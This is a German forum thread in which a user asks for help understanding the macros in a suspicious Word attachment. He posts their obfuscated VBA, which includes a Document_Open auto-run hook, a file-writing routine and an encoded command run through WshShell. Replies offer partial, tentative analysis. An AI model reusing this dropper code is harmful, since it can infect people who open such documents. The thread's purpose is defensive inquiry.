Frage zu einem bestehenden Script...

  • Word

Es gibt 18 Antworten in diesem Thema. Der letzte Beitrag () ist von mumpel.

    Frage zu einem bestehenden Script...

    Wertes Forum,
    vorab zur Info, ich weiß nicht ob ich hier mit meiner Frage an der richtigen Stelle bin UND ich habe keinerlei Ahnung von Visual Basic und habe mich lediglich hier registriert um eine Frage stellen zu können und hoffe auf eine Antwort.

    Ich habe eine Mail bekommen (vermeintlich vom SWR), an die ein Word-Dokument angehängt war. Das Scannen und Prüfen beim Abspeichern und beim abgespeicherten Dokument von meinem aktuellen Avira Antivir Pro brachte keine Warnungen.
    Beim Öffnen des Dokuments bekam ich lediglich den Hinweis, ich solle die "Bearbeitung aktivieren". Habe ich natürlich nicht gemacht. Die Einstellung bei mir ist derart, dass Macros nicht ausgeführt werden.
    Ich konnte allerdings die Macros, welche in dem Dokument enthalten waren, separieren. Nur kann ich damit nichts anfangen, wüsste aber gerne, was dieses Script macht.
    Da sind 3 Macros enthalten:
    #### Makro_1: atry7
    #### Makro_2: main
    #### Makro_3: Document_Open

    Bei einem Bekannten ist scheinbar trotz der Deaktivierung der Macros irgendwas passiert, denn er bekam dieses Word-Dokument mit Bildern aus seiner eigenen Dropbox angezeigt.
    Natürlich möchte ich das Script hier nicht abbilden, aber wenn mir jemand helfen kann und fähig ist das zu analysieren, könnte ich es anderweitig übermitteln. Für eine Hilfe wäre ich dankbar. Solange ich nicht weiß was das Script macht ist man doch eher unruhig. Der Antiovirus-Scan über das gesamte System allerdings brachte nichts zutage, alles sei in Ordnung.
    Bis dahin mal vielen Dank.

    *Topic aus dem VBA-Forum verschoben*
    => Nun doch wieder zurück verschoben.

    Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von „Marcus Gräfe“ ()

    Makros sind aus gutem Grund standardmäßig deaktiviert. Mit VBA-Makros (also in Word & Co.) kann man im Prinzip alles machen.

    Wenn du keine Mail vom SWR erwartest, wird es wohl Schadcode sein, also am besten direkt löschen.

    Wenn du aber genauer wissen willst, was das Skript macht, dann musst du uns das hier schon zeigen. VIelleicht als Screenshot, dann kann das keiner so direkt übernehmen.
    Besucht auch mein anderes Forum:
    Das Amateurfilm-Forum
    Erst einmal vielen Dank für die Antwort.

    Ja, ich hätte es gleich löschen können - mache ich in der Regel auch mit solchen Sachen, aber hier interessiert mich schon was das ggf. macht. Schon allein wegen meinem Bekannten der seine Bilder aus der Dropbox angezeigt bekam. Das mit dem Screenshot ist eine gute Idee. Kann ich einfach ein Bild von meinem PC hier einfügen? Finde dazu nichts.

    Die Scripten als Bild ...

    Vielen Dank für den Hinweis, so habe ich es gefunden.
    Vielleicht kann nun jemand sagen, was diese Scripten machen.
    Wie gesagt, würde mich nur mal interessieren.
    Vielen Dank schon mal...
    Bilder
    • Macro_1.png

      51,67 kB, 492×1.300, 85 mal angesehen
    • Macro_2.png

      38,05 kB, 978×764, 83 mal angesehen
    • Macro_3.png

      2,1 kB, 252×73, 199 mal angesehen
    So wie ich das sehe, wird einfach eine Datei erstellt und mit Inhalt gefüllt. Anschließend wird diese Datei ausgeführt.

    Was da drin steht und wie die heißt, kann man nicht sehen, weil Dateiname und Inhalt ziemlich umständlich (mit Absicht) zusammengebaut werden.

    Man könnte die eine Zeile mit run entfernen und schauen, was erzeugt wird. Wäre mir aber zu riskant.
    Besucht auch mein anderes Forum:
    Das Amateurfilm-Forum
    Die Datei, die angelegt wird, hat übrigens die Endung .xsl. Ich bin auch gar nicht sicher, ob mit dieser Datei dann irgendwas gemacht wird. Der Ausführen-Befehl kann auch was anderes machen. Ich wüsste auch nicht, wie eine xsl-Datei schädlich sein könnte. Was mich allerdings wundert ist der Dateiname bzw. Pfad. Da taucht \\ auf, was eigentlich unzulässig ist. Evtl. schreibt man so direkt in eine Dropbox? Davor ist ein "p", vielleicht das Ende von "drop" und eine Art von Protokoll für Dropbox.
    Besucht auch mein anderes Forum:
    Das Amateurfilm-Forum
    Vielen Dank Marcus,
    es scheint dann demnach jetzt nichts Großartiges zu sein was jetzt auf die Dauer Ärger macht. Der Bekannte hat jetzt auch im Nachhinein noch nichts weiter festgestellt nachdem beim ersten Öffnen der Word-Datei darin diese Dropbox-Bilder angezeigt wurden. Vielleicht ist das Ganze harmlos und nur ein übler Scherz um die Leute zu erschrecken.
    Nochmals Danke und Gruß
    Jochen
    Das, was da ausgeführt wird, kann aber durchaus neue Dateien runterladen, die dann der echte Trojaner/Virus sind. Also eine Garantie hat man da jetzt nicht.
    Besucht auch mein anderes Forum:
    Das Amateurfilm-Forum
    Vielen Dank für Eure Unterstützung bei der Sache.
    Schade, dass niemand in der Lage ist hier eine Analyse zu machen, was das Script tatsächlich tut.
    Aber bisher hat seitdem der Avira Antivir Pro auf allen Laufwerken nichts zu bemängeln gehabt.
    Auch sind keinerlei weitere Seltsamkeiten aufgetreten.
    Ich denke mal, wenn da was nachkommt, dann wird er sich schon melden.
    In diesem Sinne .... beste Grüße
    Jochen

    mainz1955 schrieb:

    eine Analyse zu machen

    Ich glaube nicht, dass es jemand ernsthaft mit dem Code auseinandergesetzt hat, denn Code-Analyse anhand eines Bildes ist mühsam und fehleranfällig. Den gesamten Code für eine Analyse abtippen? Ich glaube auch nicht, dass einer das macht.
    Wenn Du willst, dass jemand den Code genauer anschaut, dann müsstest Du den Code schon als "Code" (Text) einstellen.
    Danke mal für den Hinweis, aber das hatte ich angeboten und mir wurde gesagt, ich solle - weil dann ungefährlich - die Scripten als Bild abstellen.
    Ich will nicht gegen Forumsregeln verstoßen, also habe ich das gemacht.
    Natürlich könnte ich die Dinger auch als Text abstellen, aber danach hat bisher keiner gefragt.
    Willst du sie haben? Und wenn ja, auf welchem Wege?

    Neu

    mainz1955 schrieb:

    Ich will nicht gegen Forumsregeln verstoßen, also habe ich das gemacht

    Genau genommen hast du selbst vorgeschlagen, das Skript nicht zu posten:

    mainz1955 schrieb:

    Natürlich möchte ich das Script hier nicht abbilden

    ;)

    mainz1955 schrieb:

    Natürlich könnte ich die Dinger auch als Text abstellen

    Mach es ruhig, wenn es dir unter den Nägeln brennt. Allerdings ist noch nicht gesagt, dass jemand das Skript dann analyisiert. Es ist recht kompliziert, wenn auch nicht sehr umfangreich. Wenn man allerdings das Datei-Erstellen und das Datei-Ausführen auskommentiert und sich nur den Dateinamen und -inhalt anzeigen lässt (im Debugger), weiß man vmtl. alles, was wichtig ist.
    Besucht auch mein anderes Forum:
    Das Amateurfilm-Forum

    Neu

    Ja, ich habe es so geschrieben, Marcus,
    aber nur weil ich irgendwo in den Regeln meine gelesen zu haben, dass man das nicht unbedingt tun sollte wegen Verbreitung von Schadsoftware. :) :) :)

    Aber wenn Du es erlaubst, dann hier diese 3 Aufrufe von dem Script als Text:

    Public Sub atrY7()
    Dim aGmeS2 As Long
    aGmeS2 = 23360 * 1
    ' Publisher bought sorry oe sacristy readers

    Dim az7x5
    For az7x5 = 16 To 41
    Debug.Print Error(az7x5)
    Next az7x5
    ' Part biographical montana old
    Dim awHEeb
    awHEeb = 3832 - 3
    ' Complication fry compress chromatic
    Dim ag3Ou As Integer
    ag3Ou = 10151 * 2
    Dim aJdcfX As Integer
    Dim aGp450
    aJdcfX = 72
    aGp450 = -108 + 155
    aYUaDI = aJdcfX - aGp450
    ' Webb compulsion rudolph
    Dim alIq6 As Long
    Dim adotv
    alIq6 = -1514 + 1534
    adotv = 58
    ag9tP = alIq6 / adotv
    Dim aDWXo
    aDWXo = 5413 * 2

    Dim aaj91h
    For aaj91h = 13 To 34
    Debug.Print Error(aaj91h)
    Next aaj91h
    ' Oxygen anteroom

    Dim a84J5
    For a84J5 = 7 To 52
    Debug.Print Error(a84J5)
    Next a84J5
    ' Italics yeh baying
    Set auJwF = New frm
    aYadt = auJwF.a.value
    aC2HlL = auJwF.b.value
    asmDMa = aYadt + aC2HlL
    anbIX = "sl"
    Open aCs9Gm + aXAuD + "p\\aErFc.x" + anbIX For Output As #1
    Dim azma1p As Long
    azma1p = 32070 * 1
    Dim a9Xu7 As Long
    a9Xu7 = 29047 * 1
    ' Staffs stripes inkling happen
    Print #1, asmDMa
    Close #1
    End Sub
    Sub abkZ7(aiWlL)
    Dim aQbc9
    aQbc9 = 24530 * 1

    Dim auzW6
    For auzW6 = 19 To 59
    Debug.Print Error(auzW6)
    Next auzW6
    Dim a6E7wi As Integer
    Dim aCBgI As Integer
    a6E7wi = 9
    aCBgI = -163 + 193
    alwrP = a6E7wi * aCBgI
    Dim adYI1
    adYI1 = 32743 * 1
    ' Next loch

    Dim aBulCd
    For aBulCd = 6 To 58
    Debug.Print Error(aBulCd)
    Next aBulCd
    End Sub


    Sub Document_Open()
    Call main
    End Sub


    Document_Open
    Function auxHX()
    auxHX = Array(7, 0, 71, 71, 71, 0, 0, 68, 68, 68, 0, 5, 73, 73, 68, 70, 5, 3, 3, 7, 73, 86, 93, 11, 70, 99, 87, 96, 68, 121, 85, 72, 64, 81, 121, 86, 82, 74, 65, 75, 76, 82, 121, 31, 70, 7, 31, 81, 68, 72, 87, 74, 67, 10, 5, 81, 86, 76, 73, 5, 86, 86, 64, 70, 74, 87, 85, 5, 70, 24, 71, 71, 71, 5, 81, 64, 86, 3, 3, 76, 72, 82, 24, 68, 68, 68, 5, 81, 64, 86, 7, 5, 70, 10, 5, 65, 72, 70)
    End Function
    Sub main()
    Dim aFfUm As Integer
    Dim aUDWQ4
    aFfUm = 7 * 3
    aUDWQ4 = 3002 / 79
    atVifk = aFfUm + aUDWQ4
    ' Loom
    Dim aQ9XLY As Integer
    aQ9XLY = 31634 * 1
    ' Collation repository emit trolley

    Dim aRusj
    For aRusj = 21 To 43
    Debug.Print Error(aRusj)
    Next aRusj
    ' Nozzle tinkling dead silica seats chloe cones
    Dim a4qcU
    Dim abuh29
    a4qcU = 264 - 200
    abuh29 = 36
    aiDFId = a4qcU * abuh29
    ' Tornado snarl strut imp leggings

    Dim aqHUG
    For aqHUG = 4 To 58
    Debug.Print Error(aqHUG)
    Next aqHUG
    ' Mirror
    Call atrY7
    Set al40u = New WshShell
    al40u.run StrReverse(acBYor(auxHX, 611 - 574)), 0
    Dim aNGF2z
    Dim aK3Tsj As Integer
    aNGF2z = -9 + 126
    aK3Tsj = -26 + 77
    aRyZU = aNGF2z - aK3Tsj
    ' Delineate blocked

    End Sub

    Bis dahin mal danke.
    Jochen

    Neu

    Bitte setze den Code noch in Code-Tags: [Forum] Welche BBCodes (Tags) gibt es hier im Forum zum Einfärben von Quellcodes (Syntax-Highlighting)?

    In meinen Augen kann das Skript gar nicht so laufen, es sei denn, es gab noch mehr in dem Word-Dokument. Da wäre z. B. acBYor, was nicht definiert ist. Das müsste eine Funktion oder ein Array sein. Und Set auJwF = New frm ruft irgendein Objekt mit dem Namen "frm" ab, was es im Code nicht gibt. Evtl. ein Formular, also eine UserForm?

    EDIT: Ich habe den Thread nun übrigens vom OT-Bereich doch wieder zurück nach VBA gepackt. Ist ja im Prinzip schon eine Programmierfrage.
    Besucht auch mein anderes Forum:
    Das Amateurfilm-Forum

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von „Marcus Gräfe“ ()

    Neu

    Lieber Marcus,

    damit bin ich überfordert, habe keine Ahnung davon wie man das macht, oder was hier zu tun ist.
    Ich denke, ich lasse es mal gut sein. Im Dokument waren keine weiteren Macros und ich gehe davon aus, dass es gegen die Wand gelaufen ist und dabei nichts angestellt hat.
    Lässt sich ja auch nirgends etwas finden.

    Nochmals Danke für die Mühe.
    Gruß Jochen

    Neu

    Hallo!

    So wie es aussieht hat da jemand den Code verschlüsselt (Stichwort: CrunchCode). Nicht sehr vetrauenswürdig.

    Marcus Gräfe schrieb:


    Wenn du keine Mail vom SWR erwartest, wird es wohl Schadcode sein, also am besten direkt löschen.

    Der SWR versendet m.W. keine Dateien, schon garnicht mit Anhang und VBA-Code. Ich würde den SWR darüber informieren, damit er seinerseits eine offizielle "Presse"-Meldung abgeben kann (auf der SWR-Homepage z.B.). Man sollte generell keine unangeforderten Dateien öffnen.

    Marcus Gräfe schrieb:

    Die Datei, die angelegt wird, hat übrigens die Endung .xsl. Ich bin auch gar nicht sicher, ob mit dieser Datei dann irgendwas gemacht wird.

    Eigentlich ist xsl (extensible stylesheet languange) ein Stylesheet, welches nur das Aussehen (Layout) einer XML-Datei vorgibt. Einen Schadcode kann xsl eigentlich nicht enthalten.